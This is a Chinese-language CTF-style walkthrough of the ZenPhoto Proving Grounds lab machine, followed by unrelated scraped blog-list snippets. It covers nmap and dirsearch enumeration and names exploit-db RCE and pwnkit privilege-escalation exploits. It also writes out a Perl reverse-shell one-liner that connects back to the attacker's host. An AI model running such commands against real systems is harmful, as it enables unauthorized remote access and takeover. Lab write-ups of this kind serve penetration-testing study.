nmap 
nmap -p- -A -sS 192.168.128.41

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-13 07:17 UTC

Nmap scan report for 192.168.128.41

Host is up (0.071s latency).

Not shown: 65531 closed tcp ports (reset)

PORT     STATE SERVICE VERSION

22/tcp   open  ssh     OpenSSH 5.3p1 Debian 3ubuntu7 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

|   1024 83:92:ab:f2:b7:6e:27:08:7b:a9:b8:72:32:8c:cc:29 (DSA)

|_  2048 65:77:fa:50:fd:4d:9e:f1:67:e5:cc:0c:c6:96:f2:3e (RSA)

23/tcp   open  ipp     CUPS 1.4

|_http-server-header: CUPS/1.4

| http-methods:

|_  Potentially risky methods: PUT

|_http-title: 403 Forbidden

80/tcp   open  http    Apache httpd 2.2.14 ((Ubuntu))

|_http-server-header: Apache/2.2.14 (Ubuntu)

|_http-title: Site doesn't have a title (text/html).

3306/tcp open  mysql   MySQL (unauthorized)

No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

TCP/IP fingerprint:

OS:SCAN(V=7.94SVN%E=4%D=1/13%OT=22%CT=1%CU=31646%PV=Y%DS=4%DC=T%G=Y%TM=6784

OS:BE54%P=x86_64-pc-linux-gnu)SEQ(SP=C6%GCD=1%ISR=D2%TI=Z%CI=Z%II=I%TS=8)OP

OS:S(O1=M578ST11NW6%O2=M578ST11NW6%O3=M578NNT11NW6%O4=M578ST11NW6%O5=M578ST

OS:11NW6%O6=M578ST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0)EC

OS:N(R=Y%DF=Y%T=40%W=16D0%O=M578NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=

OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(

OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%

OS:F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G

OS:%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 4 hops

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 1720/tcp)

HOP RTT      ADDRESS

1   69.93 ms 192.168.45.1

2   69.91 ms 192.168.45.254

3   70.59 ms 192.168.251.1

4   71.42 ms 192.168.128.41

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 85.97 seconds

访问80端口 说是正在开发中



dirsearch扫描一下发现有test路径



上去看看



没啥东西

我们递归扫描

test路径 dirsearch -u http://192.168.128.41/test/

果不其然发现了一些新的东西

发现都是空文件夹

回到nmap

发现23 ipp端口暴露了版本号

搜索exp

https://www.exploit-db.com/exploits/41233 搜到个这个

但是好像打不了

卡了一小会

我拿bp抓包再次看了看/test/index.php

发现还有个路径 我们没发现

访问这个路径 我们就发现了后台

尝试弱口令admin admin

发现登录不上去

于是上网查找这个cms的漏洞 发现有好多

慢慢找 最终发现了这个rce 的exp

https://www.exploit-db.com/exploits/18083

rce成功!!!!!



尝试反弹shell

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.45.250:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

反弹成功

提权环节 发现一个比较特别的可执行suid 文件! X



也不知道是个啥东西

查看版本看看具体内容

上网搜exp

发现了一个

https://www.exploit-db.com/exploits/45697

好像不太行

看看数据库密码



登上去看看有啥

发现了admin的密码 但是我爆破了半天发现跑破不出来

再看看有无其他线索

在linpeas的帮助下 我们发现了sudo的版本过低

提权脚本

https://github.com/arthepsy/CVE-2021-4034/blob/main/cve-2021-4034-poc.c



提权成功

ZenPhoto pg walkthrough Intermediate的更多相关文章

  1. 简析服务端通过GT导入SHP至PG的方法

    文章版权由作者李晓晖和博客园共有,若转载请于明显处标明出处:http://www.cnblogs.com/naaoveGIS/ 1.背景 项目中需要在浏览器端直接上传SHP后服务端进行数据的自动入PG ...

  2. Bootstap datetimepicker报错TypeError: intermediate value

    Bootstrap datetimepicker有多个版本,官方的链接中,只是datepicker,没有时间的选择,原版的datetimepicker也不再更新,不能用新版的jquery.现在http ...

  3. PG 中 JSON 字段的应用

    13 年发现 pg 有了 json 类型,便从 oracle 转 pg,几年下来也算比较熟稔了,总结几个有益的实践. 用途一:存储设计时无法预料的文档性的数据.比如,通常可以在人员表准备一个 json ...

  4. pg gem 安装(postgresql94)

    使用下面命令安装报错 gem install pg 错误: [root@AS-test middle_database]# gem install pgBuilding native extensio ...

  5. #pg学习#postgresql的安装

    1.按照官网给的步骤编译安装(Mac安装是比较容易的,相比Liunx) cd /Users/renlipeng/Desktop/postgresql-9.5.1 ./configure --prefi ...

  6. PG 函数的易变性(Function Volatility Categories)

    此概念的接触是在做分区表的时候碰到的,分区表按时间字段分区,在查询时当where条件中时间为now()或者current_time()等时是无法查询的,即使进行格式转换也不行,只有是时间格式如‘201 ...

  7. c++错误——intermediate.manifest : general error c1010070很傻的错

    .\Debug\sadf.exe.intermediate.manifest : general error c1010070: Failed to load and parse the manife ...

  8. mysql 序列与pg序列的比较

    mysql序列(这里只谈innodb引擎): 在使用mysql的AUTO_INCREMENT时,使用AUTO_INCREMENT的字段必须建有索引,也可以为索引的一部分.当没有索引时会报错:      ...

  9. 使用zfs进行pg的pitr恢复测试

    前段时间做了一下zfs做pg的增量恢复测试,mark一下. 服务器信息: 主机:192.168.173.43 备机:192.168.173.41 主备使用流复制搭建,在备机上面进行了zfs快照备份. ...

  10. PG CREATEINDEX CONCURRENTLY

    PG CREATEINDEX CONCURRENTLY [TOC] 官方说法 根据9.1的文档 Creating an index can interfere with regular operati ...

随机推荐

  1. html JavaScript 点击图片放大,点击图片缩小

    参考地址 https://www.jq22.com/webqd7166 可以下载demo 然后对着改 我的是这么用的 前置,先把图片 class 自定义设置 item_img $.fn.ImgZoom ...

  2. Flink 实战之从 Kafka 到 ES

    Flink 实战系列 -- 从 Kafka 到 ES [Flink 实战系列]通过一个个简单的例子,图解分析 Flink 的底层原理. 做个数据搬运工 本例的场景非常常见:消费 Kafka 的数据写入 ...

  3. 【一步步开发AI运动小程序】十二、自定义一个运动分析器,实现计时计数01

    随着人工智能技术的不断发展,阿里体育等IT大厂,推出的"乐动力"."天天跳绳"AI运动APP,让云上运动会.线上运动会.健身打卡.AI体育指导等概念空前火热.那 ...

  4. ElementUI ---- dialog点击取消后蒙遮层不消失

    场景: 页面A打开了 dialog, 然后点击 页面A dialog 的按钮 跳转到 页面B,并且打开页面B的 dialog 但是页面B的 dialog 关闭后,蒙遮层并没消失(已经设置了 :appe ...

  5. 开发Git分支管理

    目前分支管理 AngularJS在github上的提交记录被业内大多数开发人员认可,逐渐被广泛引用. 代码提交Message格式 type (scope): message 参数介绍: 1.type: ...

  6. GitLab的备份与恢复

    一.备份 1. docker执行备份 docker exec gitlab gitlab-rake gitlab:backup:create 默认将备份文件保存至docker的/var/opt/git ...

  7. 群晖 MariaDB10 开启远程登录

    ​情况:MariaDB设置了TCP/IP的端口,但是还是无法进行远程访问. 解决方法: 一.使用ssh登录群晖,并进入MariaDB安装目录 cd /volume1/@appstore/MariaDB ...

  8. 内网穿透之http代理服务器

    在公网访问内网http服务可以用内网穿透工具,例如frp和nps等优秀工具.但我发现这类工具会在服务器启动不止一个端口,对于有些网络审查来说很容易发现在进行内网穿透.因此我想是否可以只在服务器启动一个 ...

  9. bug记录:Vue.use 加载 TabPane ,浏览器卡死

    问题描述 Vue.use 加载 TabPane ,浏览器卡死 原因分析 参考资料:https://blog.csdn.net/ye987987/article/details/103780297 经过 ...

  10. mysql restart

    bin/mysqld --defaults-file=/etc/mysql.cnf --user=mysql bin/mysqld --user=app --basedir=/opt/mysql-5. ...